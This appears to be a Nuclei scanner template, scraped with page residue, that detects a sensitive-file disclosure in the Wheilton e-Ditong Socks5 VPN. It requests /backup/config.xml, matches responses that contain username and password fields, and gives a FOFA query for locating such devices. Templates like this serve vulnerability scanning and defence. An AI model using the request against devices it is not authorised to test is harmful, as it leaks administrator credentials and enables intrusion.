41 lines
1.3 KiB
YAML
41 lines
1.3 KiB
YAML
id: socks5-vpn-config
|
|
|
|
info:
|
|
name: Socks5 VPN - Sensitive File Disclosure
|
|
author: DhiyaneshDk
|
|
severity: high
|
|
description: |
|
|
Information Leakage in the Socks5 VPN login system of Wheilton e-Ditong, and the administrator account password can be obtained by visiting a specially crafted URL.
|
|
reference:
|
|
- https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E6%83%A0%E5%B0%94%E9%A1%BF%20e%E5%9C%B0%E9%80%9A%20config.xml%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
|
|
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E6%83%A0%E5%B0%94%E9%A1%BF/%E6%83%A0%E5%B0%94%E9%A1%BF%20e%E5%9C%B0%E9%80%9A%20config.xml%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md?plain=1
|
|
metadata:
|
|
max-request: 1
|
|
verified: true
|
|
fofa-query: app="惠尔顿-e地通VPN"
|
|
tags: esocks5,exposure,misconfig,files,disclosure
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/backup/config.xml"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<config>"
|
|
- "password="
|
|
- "username="
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/xml"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|